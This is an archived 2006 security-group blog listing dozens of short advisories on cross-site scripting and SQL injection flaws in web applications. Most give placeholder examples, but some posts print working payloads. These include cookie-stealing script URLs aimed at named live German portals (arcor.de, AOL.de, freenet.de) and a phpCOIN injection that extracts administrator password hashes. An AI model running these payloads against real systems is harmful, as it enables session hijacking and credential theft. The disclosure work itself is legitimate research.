by r0t,der4444,cembo,VietMafia

Friday, March 31, 2006

SiteSearch Indexer 3.5 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 31 march 2006
vendor:www.marcreed.com/projects/search_indexer/tutorial/
affected versions: 3.5 and prior
###############################################

Vuln. description

SiteSearch Indexer contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "searchField" paremeter in "searchresults.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:

/search/searchresults.asp?searchField=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Keystone DLS SQL vuln.

###############################################
Vuln. discovered by : r0t
Date: 31 march 2006
vendor:http://www.indexdata.dk/keystone/
affected versions: 1.5.4 and prior
###############################################

Vuln. description:

Keystone Digital Library Suite contains a flaw that allows a remote sql injection attacks.Input passed to the "subject_type_id" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

examples:

/?subject_type_id=[SQL]
/search/?number=10&search_type=&subject_type_id=[SQL]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Mantis XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 31 march 2006
vendor:http://www.mantisbt.org/
affected versions:Mantis 1.0.1 and 1.0.0rc5 and prior
###############################################

Vuln. Description:

Mantis contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "start_day" "start_year" "start_month" paremeters in "view_all_set.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/view_all_set.php?type=1&temporary=y&do_filter_by_date
=on&start_year=2006&start_month=03&start_day=[XSS]

/view_all_set.php?type=1&temporary=y&do_filter_by_date=
on&start_year=[XSS]

/view_all_set.php?type=1&temporary=y&do_filter_by_date
=on&start_year=2006&start_month=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Wednesday, March 29, 2006

arcor.de multiple XSS vuln.

here will be few examples of them that portal contains more than 100 xss vulns. so i dont post all examples here.

https://www.arcor.de/netpass/home.jsp?username=
%22%3Cscript%3Ealert%28document.cookie%29%3C%2
Fscript%3E&password=r0t&login.x=40&login.y=11

https://www.arcor.de/netpass/home.jsp?username=r0t
&password=%22%3Cscript%3Ealert%28document.cookie
%29%3C%2Fscript%3E&login.x=40&login.y=11


https://www.arcor.de/netpass/einrichten.jsp?username
=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
&password=r0t&password2=r0t&speichern.x=55&speich
ern.y=11


https://www.arcor.de/netpass/einrichten.jsp?username
=r0t&password=%22%3Cscript%3Ealert(document.cookie)%3
C/script%3E&password2=r0t&speichern.x=55&speichern.y=11

https://www.arcor.de/netpass/einrichten.jsp?username=
r0t&password=r0t&password2=%22%3Cscript%3Ealert(docum
ent.cookie)%3C/script%3E&speichern.x=55&speichern.y=11



http://www.arcor.de/content/srearchresult.jsp?Keywords=
Auto&teaser=1&scategorytype=web&searchID1=&searchID2=
&naviID=%22%3Cscript%3Ealert('r0t')%3C/script%3E


http://www.arcor.de/content/srearchresult.jsp?Keywords=
Auto&teaser=1&scategorytype=web&searchID1=&searchID2=%2
2%3Cscript%3Ealert('r0t')%3C/script%3E


http://www.arcor.de/content/srearchresult.jsp?Keywords=
Auto&teaser=1&scategorytype=web&searchID1=%22%3Cscript%
3Ealert('r0t')%3C/script%3E

http://www.arcor.de/login/login.jsp?goto=/tp/chatuser/?
channel=%22%3Cscript%3Ealert('r0t')%3C/script%3E


http://www.arcor.de/login/login.jsp?goto=%22%3Cscript%3Ea
lert('r0t')%3C/script%3E

http://www.arcor.de/gaming/login.jsp?goto=/gaming/highs
core.jsp%3Fplay=go%26gameID=%22%3Cscript%3Ealert('r0t')%3
C/script%3E

http://www.arcor.de/gaming/login.jsp?goto=/gaming/highscor
e.jsp%3Fplay=%22%3Cscript%3Ealert('r0t')%3C/script%3E

http://www.arcor.de/gaming/login.jsp?goto=%22%3Cscript%3Ea
lert('r0t')%3C/script%3E

http://www.arcor.de/tophopp/topflop.jsp?typ=%22%3Cscript%3
Ealert('r0t')%3C/script%3E

http://www.arcor.de/login/login.jsp?goto=%22%3Cscript%3Eale
rt('r0t')%3C/script%3E


If my report are reading arcor coders or project owners, and will get full list of vuln. you can contact me via th3cracker at gmail.com

GMX mail XSS

full full today report wasnt enough so i spend 30 seconds more for gmx.de

to see vuln. you must amnually enter XSS paramters in any of those fields below.

http://www101.gmx.net/de/cgi/pwprint

Ihre alternative e-mail-Adresse: XSS

Ihre Handy-Nummer: XSS

betandwin.de XSS

To see example, manually enter any of my previous XSS examples in search"Wetten suchen:" paremters.

XSS in AOL.de

here is one another email service wich isnt secure.


http://www.aol.de/unternehmen/presse/meldung_detail.jsp?cid=&
backlink=%22%3Cscript%3Ealert('r0t')%3C/script%3E

freenet.de XSS

lot off germans use this mail service

http://office.freenet.de/dienste/emailoffice/service/
serv_generic_msg/index.html?msg=%3Cscript%3Ealert
(document.cookie)%3C/script%3E

Tuesday, March 28, 2006

phpCOIN v1.2.2 XSS vuln.

phpCOIN v1.2.2 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 28 march 2006
vendor:http://www.phpcoin.com/
affected versions:V.1.2.2 and prior
###############################################

Vuln. Description:

phpCOIN contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "fs" paremeter in "mod.php" and "mod_print.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:


/mod_print.php?mod=helpdesk&sb=&so=&fb=&fs=[XSS]
/mod.php?mod=orders&mode=view&sb=1&so=A&fb=&fs=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

classifiedZONE v1.2 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 28 march 2006
vendor:http://www.fusionzone.com/applications/classifieds/
affected versions:v.1.2 and prior
###############################################

Vuln. Description:

classifiedZONE contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "rtn" paremeter in "accountlogon.cfm" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


example:

/accountlogon.cfm?rtn=%22%3Cscript
%3Ealert('r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

realestateZONE 4.2 Multiple XSS vuln.

realestateZONE 4.2 Multiple XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 28 march 2006
vendor:http://www.fusionzone.com/applications/realestate/
affected versions:v.4.2 and prior
###############################################


Vuln. Description:


realestateZONE contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "bamin" "bemin" "pmin" "state" paremter in "index.cfm" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/index.cfm?pg=278&redir=listings&ui=&bamin=%22%3Cscript
%3Ealert('r0t')%3C/script%3E

/index.cfm?pg=278&redir=listings&ui=&bamin=0&bemin=%22%
3Cscript%3Ealert('r0t')%3C/script%3E

/index.cfm?pg=278&redir=listings&ui=&bamin=0&bemin=0&pmi
n=%22%3Cscript%3Ealert('r0t')%3C/script%3E

/index.cfm?pg=278&redir=listings&ui=&bamin=0&bemin=0&pmi
n=0&pmax=99999999&zc=&city=&state=%22%3Cscript%3Ealert('
r0t')%3C/script%3E

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

couponZONE v.4.2 Multiple vuln.

###############################################
Vuln. discovered by : r0t
Date: 28 march 2006
vendor:http://www.fusionzone.com/applications/coupons
affected versions:v.4.2 and prior
###############################################


Vuln. Description:
1.
couponZONE contains a flaw that may allow an attacker to carry out an SQL injection attack. The issue is due to the local.cfm script not properly sanitizing user-supplied input to the 'companyid', 'scat' or 'coid' variables. This may allow an attacker to inject or manipulate SQL queries in the backend database.

Additionally, if a failed query is performed, the program will disclose the softwares installation path. While such information is relatively low risk, it is often useful in carrying out additional, more focused attacks.

examples:

/local.cfm?redir=listings&srchby=&companyid=[SQL]
/local.cfm?redir=listings&srchby=ct&cat=&scat=[SQL]
/local.cfm?redir=adv_details&coid=[SQL]


2.
couponZONE contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "srchfor" and "srchby" paremter in "local.cfm" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/local.cfm?srchfor=%3Cscript%3Ealert%28%27r0t%27%29%3
C%2Fscript%3E&cat=0&x=95&y=13&RequestTimeOut=500&redi
r=listings&srchby=fr&scat=0

/local.cfm?srchfor=&cat=0&x=78&y=22&RequestTimeOut=50
0&redir=listings&srchby=%22%3Cscript%3Ealert('r0t')%3
C/script%3E



###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

ActiveCampaign SupportTrio 2.5 vuln.

###############################################
Vuln. discovered by : r0t
Date: 28 march 2006
vendor:http://www.activecampaign.com/
affected versions: 2.50.2
###############################################


Vuln. description:

ActiveCampaign SupportTrio contains a flaw that allows a remote cross site scripting attack. This flaw exists because
input passed to the KnowledgeBase search module field parameters when performing a search isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.



+


attacker (manulally request) with fatal error´s gets
full install. path...:

/supporttrio/index.php?action=kb&article=[r0t]
/supporttrio/index.php?action=kb&print=[r0t]
/supporttrio/modules/KB/pdf.php?category=[r0t]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Monday, March 27, 2006

CONTROLzx HMS - Hosting Management System vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 march 2006
vendor:http://front.controlzx.com/
affected versions:V.3.3.4 and prior
###############################################

Vuln. description:


CONTROLzx HMS contains a flaws that allows a remote cross site scripting attacks.
Those flaws exists because input passed to "dedicatedPlanID" parameter in "dedicated_order.php" and "sharedPlanID" parameter in "shared_order.php" and "plan_id" parameter in "/customers/server_management.php" isn't properly sanitised before being returned to the user.
And input passed to email field in "/customers/forgotpass.php" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples :

/shared_order.php?sharedPlanID=1[XSS]
/dedicated_order.php?dedicatedPlanID=1[XSS]
/customers/server_management.php?plan_id=1[XSS]


+

/small update/

As this software had few months ago another name "DRZES HMS" i was reported about for multiple vuln. in DRZES HMS 3.2(Look at adtional info.)
So here just for update is one from 3.2 version, wich isnt fixed in last releases:

Input passed to search field in "/customers/register_domain.php" isn't properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


##############################################
DRZES HMS 3.2 - multiple SQL inj. and XSS vuln.
http://pridels.blogspot.com/2005/11/drzes-hms-32-multiple-vuln.html
###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Connect Daily Multiple XSS vuln.

Connect Daily Web Calendar Software Multiple XSS vuln.


###############################################
Vuln. discovered by : r0t
Date: 27 march 2006
vendor:http://www.mhsoftware.com/connectdaily.htm
affected versions:3.2.9 and prior
###############################################

Vuln. description:



Connect Daily Web Calendar Software contains a flaw that allows a remote cross site scripting attack.
This flaw exists because input passed to:
a.) "calendar_id","style_sheet","start" parameters in "ViewDay.html" ,
b.) "txtSearch","opgSearch" parameters in "ViewSearch.html" ,
c.) "calendar_id","approved" parameters in "ViewYear.html" ,
d.) "item_type_id" parameter in "ViewCal.html" ,
e.) "week" parameter in "ViewWeek.html" ,
isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.




/ViewDay.html?start=2453810&&integral=0&style_sheet=
userStyle.css&dropdown=1&show_stop=0&show_resources=
0&calendar_id=[XSS]

/ViewDay.html?start=2453810&&integral=0&style_sheet=[XSS]

/ViewDay.html?start=[XSS]

/ViewCal.html?item_type_id=[XSS]

/ViewSearch.html?integral=0&show_stop=0&show_resourc
es=0&criteria=calendar_id%3D34&txtSearch=[XSS]

/ViewSearch.html?integral=0&show_stop=0&show_resourc
es=0&criteria=calendar_id%3D34&txtSearch=&opgFields=
1&opgSearch=[XSS]

/ViewSearch.html?integral=0&show_stop=0&show_resourc
es=0&criteria=calendar_id%3D34&txtSearch=&opgFields=[XSS]

/ViewYear.html?n=1&dropdown=1&integral=0&approved=1
&show_stop=0&show_resources=0&calendar_id=[XSS]

/ViewYear.html?n=1&dropdown=1&integral=0&approved=[XSS]

/ViewWeek.html?year=2006&week=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Its great to be back.

After 3 monthes vacation im back , so i will focused more to our board, cauz there are too many fields wich are empty...



btw...

e-secure-it.nl

http://www.e-secure-it.nl/alert.asp?alertid=[XSS]

also search engine have same problem.

Helm Web Hosting Control Panel XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 march 2006
vendor:http://www.webhostautomation.com/
affected versions:3.2.10 and prior
###############################################

Vuln. description:

Helm Web Hosting Control Panel contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "txtDomainName" parameter in "domains.asp" and in helm online help input passed to "SearchText","UserLevel" parameters in "default.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


/interfaces/standard/domains.asp?txtDomainName=[XSS]
/helmonlinehelp/default.asp?categoryID=24&UserLevel=2&SearchText=[XSS]
/helmonlinehelp/default.asp?categoryID=24&UserLevel=[XSS]

Successful exploitation with any(user/reseller/admin) level access.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Metisware Instructor XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 march 2006
vendor:http://www.metisware.com/
affected versions:1.3 and prior
###############################################

Vuln. description:

Instructor contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to Task field parameter in "/MyTasks/PersonalTaskEdit.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Web Quiz pro XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 march 2006
vendor:www.calorisplanitia.com/online-quiz-system.aspx
affected versions: pro
###############################################

Vuln. description:

Web Quiz pro contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "exam" parameter in "prequiz.asp" and "msg" parameter in "student.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


/prequiz.asp?examid=1&exam=[XSS]
/student.asp?msg=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

E-School Management System XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 march 2006
vendor:www.calorisplanitia.com/e-school-management-system.aspx
affected versions: 1.0 and prior
###############################################

Vuln. description:

E-School Management System contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "msg" parameter in "default.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


/default.asp?msg=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

EZHomepagePro multiple XSS vuln.

EZHomepagePro multiple XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 march 2006
vendor:www.htmljunction.net/ezhomepagepro/index.asp
affected versions: v1.5 and prior
###############################################


Vuln. description:

EZHomepagePro contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "adid","aname" paremters in "/common/email.asp","/users/users_search.asp","/users/users_profiles.asp" and "m" paremter in "/users/users_search.asp" and "page" paremter in "/users/users_calendar.asp" and "usid" paremter in "/users/users_mgallery.asp" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

examples:

/common/email.asp?page=user&m=y&select=r0t-&usid
=2&uname=guest&aname=&adid=[XSS]

/common/email.asp?page=user&m=y&select=r0t-&usid
=2&uname=&aname=[XSS]

/users/users_search.asp?page=user&uname=r0t&usid=
2&aname=&adid=&m=[XSS]

/users/users_search.asp?page=user&uname=r0t&usid=
2&aname=&adid=[XSS]

/users/users_search.asp?page=user&uname=r0t&usid=
2&aname=[XSS]

/users/users_calendar.asp?view=yes&action=write&una
me=r0t&usid=2&date=3/2/2006&sdate=3/2/2006&page=[XSS]

/users/users_profiles.asp?page=user&uname=r0t&usid=
2&aname=&adid=[XSS]

/users/users_profiles.asp?page=user&uname=r0t&usid=
2&aname=[XSS]

/users/users_mgallery.asp?gn=r0t&gp=guest&fl=Favor
ites&usid=[XSS]


###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

WebAPP multiple XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 march 2006
vendor:http://www.web-app.org/
affected versions: 0.9.9.3.2 and prior
###############################################

Vuln. description:


WebAPP contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "action","id","num","board","cat","real","viewcat","img","curcatname" paremters in "index.cgi" and "vsSD" paremter in "/mods/calendar/index.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.



examples:

http://victim/cgi-bin/index.cgi?action=[XSS]

http://victim/cgi-bin/index.cgi?action=&id=[XSS]

http://victim/cgi-bin/index.cgi?action=forum
&board=chitchat&op=&num=[XSS]

http://victim/cgi-bin/index.cgi?action=&board=[XSS]

http://victim/cgi-bin/index.cgi?action=&cat=[XSS]

http://victim/cgi-bin/index.cgi?action=
otherarticles&writer=&real=[XSS]

http://victim/cgi-bin/index.cgi?action=&viewcat=[XSS]

http://victim/cgi-bin/index.cgi?action=printtopic&id=
1&curcatname=&img=[XSS]

http://victim/cgi-bin/index.cgi?action=printtopic&id=
1&curcatname=[XSS]

http://victim/cgi-bin/mods/calendar/index.cgi?vsSD=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

BlankOL XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 27 march 2006
vendor:http://www.blankol.com/
affected versions: 1 and prior
###############################################

Vuln. description:

BlankOL contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "file" and "function" paremters in "bol.cgi" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

/bol.cgi?file=[XSS]
/bol.cgi?function=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Saturday, March 25, 2006

Absolute Image Gallery XE 2.0 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 march 2006
vendor:http://www.xigla.com/absoluteig/index.htm
affected versions:V2.0 and prior
###############################################

Vuln. Description:

Absolute Image Gallery XE contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed "shownew" paremter in "gallery.asp" and parameters in search module isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.


1 example provided:

/gallery.asp?action=viewimage&categoryid=8&text
=&imageid=43&box=&shownew=[XSS]

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Absolute Live Support XE V2.0 XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 march 2006
vendor:http://www.xigla.com/absolutels/index.htm
affected versions:V2.0 and prior
###############################################

Vuln. Description:

Absolute Live Support XE contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed "Screen name" and "Session Topic" field paremters in register page isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Absolute FAQ Manager .NET XSS vuln.

Absolute FAQ Manager .NET XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 march 2006
vendor: http://www.xigla.com/absolutefmnet/
affected versions: Version 4.0 and prior
###############################################

Vuln. Description:

Absolute FAQ Manager .NET contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed search module paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

uniForum XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 march 2006
vendor:http://uniforum.biz/
affected versions: uniForum Version 4 and prior
###############################################

Vuln. Description:

uniForum contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to username & email field paremters in "wbadmlog.aspx" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

XSS vuln. in dotNetBB <= v2.4

XSS vuln. in dotNetBB <= v2.4

###############################################
Vuln. discovered by : r0t
Date: 25 march 2006
vendor:http://www.dotnetbb.com/
affected versions:2.42EC SP 3 and prior
###############################################

Vuln. Description:

dotNetBB contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to email field "em" paremter in "iforget.aspx" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

SweetSuite.NET - ssCMS 2.1.x XSS vuln.

###############################################
Vuln. discovered by : r0t
Date: 25 march 2006
vendor: www.sweetsuite.net/ssCMSMain.aspx
affected versions: 2.1.0 and prior
###############################################

Vuln. Description:

ssCMS contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "keywords" paremter in "search.aspx" isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.

###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

XSS in <= Toast Forums 1.6

###############################################
Vuln. discovered by : r0t
Date: 25 march 2006
vendor:http://www.toastforums.com/
affected versions: 1.6 and prior
###############################################

Vuln. Description.

Toast Forums contains a flaw that allows a remote cross site scripting attack. This flaw exists because input passed to "author","subject","message","dayprune" paremters isn't properly sanitised before being returned to the user.
This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity.



/toast.asp?action=posts&sub=search&fid=
-1&author=[XSS]

/toast.asp?action=posts&sub=search&fid=
-1&author=r0t&subject=[XSS]

/toast.asp?action=posts&sub=search&fid=
-1&author=r0t&subject=&message=[XSS]


/toast.asp?action=posts&sub=search&fid=
-1&author=r0t&subject=&message=&dayprune=[XSS]
###############################################

Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ wwww.unsecured-systems.com/forum/

Thursday, March 23, 2006

AdMan v1.0.x SQL vuln

##########################################
Vuln. discovered by : r0t
Date: 23 march 2006
vendor:www.formfields.com/adManArea/
affected versions: v1.0.20051221 and prior
#########################################
SQL vuln.

AdMan contains a flaw that allows a remote sql injection attacks.Input passed to the "transactions_offset" parameter in "advertiser/viewStatement.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


example:

/adMan/advertiser/viewStatement.php?start_date_date_month=03
&start_date_date_day=01&start_date_date_year=2008&start_date
_time_hour=12&start_date_time_min=00&start_date_time_amPm=AM
&end_date_date_month=&end_date_date_day=&end_date_date_year=
&end_date_time_hour=&end_date_time_min=&end_date_time_amPm=&
_submit=&transactions_offset=[SQL]

#########################################

+

To get full install. path:

/adMan/advertiser/editCampaign.php?campaignId=
/adMan/advertiser/viewPricingScheme.php?schemeId=

#########################################

Solution:

Edit the source code to ensure that input is properly sanitised.

########################################

You can discuz about that vuln.
@ unsecured-systems.com/forum

Wednesday, March 22, 2006

1WebCalendar v 4.x vuln.

1WebCalendar v 4.x vuln.

##############################################
Vuln. discovered by : r0t
Date: 22 march 2006
vendor:www.bensonitsolutions.com/calendar/v4/
affected version: v4.0 and prior
##############################################

Vuln.desc.

1WebCalendar contains a flaw that allows a remote sql injection attacks.Input passed to the "EventID" ,”NewsID” ,"ThisDate" parameter isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code

/viewEvent.cfm?EventID=[code]
/news/newsView.cfm?NewsID=[code]
/mainCal.cfm?=[code]

also attacker can easy get install. path just with testing those holes*
###############################################
Solution:
Edit the source code to ensure that input is properly sanitised.
###############################################
More information @ unsecured-systems.com/forum/

Friday, March 17, 2006

phpcoin p.o.c.

This is for the phpcoin public vulnerability.

/phpcoin/mod.php?mod=pages&mode=list&dtopic_id
=88888%20and%201=0%20union%20select%201222,admin_u
ser_pword,322,224,225,226,227,228,229,2211,2212,22
21%20from%20phpcoin_admins/*

There was no proof of concept included in the orginal posting
(by whoever it was that discovered it)

To request p.o.c. exploits join the forum at:
http://www.unsecured-systems.com/forum/

(we will only give p.o.c. exploits for public vulnerabilities)

Thursday, March 02, 2006

NZ Ecommerce SQL&XSS vuln.

Vuln. discovered by : r0t
Date: 2 march 2006
vendor: www.digitalbuilder.co.nz/Product_Code_NZEcommerce.asp
affected version: latest



1.XSS

Input passed to the "action" parameter in “index.php” isn't properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.


2. SQL

NZ Ecommerce contains a flaw that allows a remote sql injection attacks.Input passed to the "informationID" ,”ParentCategory”parameter in "index.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code


POC.

/index.php?action=Information&informationID=[SQL]
/index.php?action=DisplayOverviewproduct&ParentCategory=[SQL]


Solution:
Edit the source code to ensure that input is properly sanitised.

 
Copyright (c) 2006 Pridels Sec Crew